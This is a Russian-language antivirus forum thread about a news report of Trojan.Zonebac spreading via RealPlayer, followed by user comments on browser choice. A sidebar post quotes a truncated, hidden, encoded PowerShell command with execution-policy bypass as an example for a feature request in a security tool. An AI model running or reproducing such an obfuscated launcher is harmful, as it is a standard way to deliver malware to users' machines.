Перейти к содержанию
AM_Bot

Real Media рассадила трояна через RealPlayer

Recommended Posts

AM_Bot

Жертвами трояна могли стать пользователи, посещавшие через Internet Explorer ряд сайтов, хостящихся на Tripod.com и Lycos.com и, возможно, другие площадки - если на их компьютерах был установлен RealPlayer. Проникнув на компьютер, Trojan.Zonebac отключает анти-вирус и другие установленные защитные утилиты, снижает уровень безопасности браузера и изменяет регистр так, чтобы запускаться каждый раз при запуске компьютера.

...

Прочитать всю новость »

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lemmit

Real Media рассадила... Юристам компании Real Media звучание этой фразы должно понравиться.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
IT-Shark

О сколько раз твердили миру - не юзайте Осла! (с)

Всё равно тупо и твердолобо юзают!

Хоть ты тресни!

Ну если иначе не могут, пусть хотя бы Права порежут!

А ещё лучше Оперу скачать и поставить - немногим она Осла хуже.

Скорее даже лучше: быстро и безопасно!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
TANUKI

А на мой взгляд лучше не юзать вот такое сайто-привязанное ПО, типа РеалПлеера. :?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×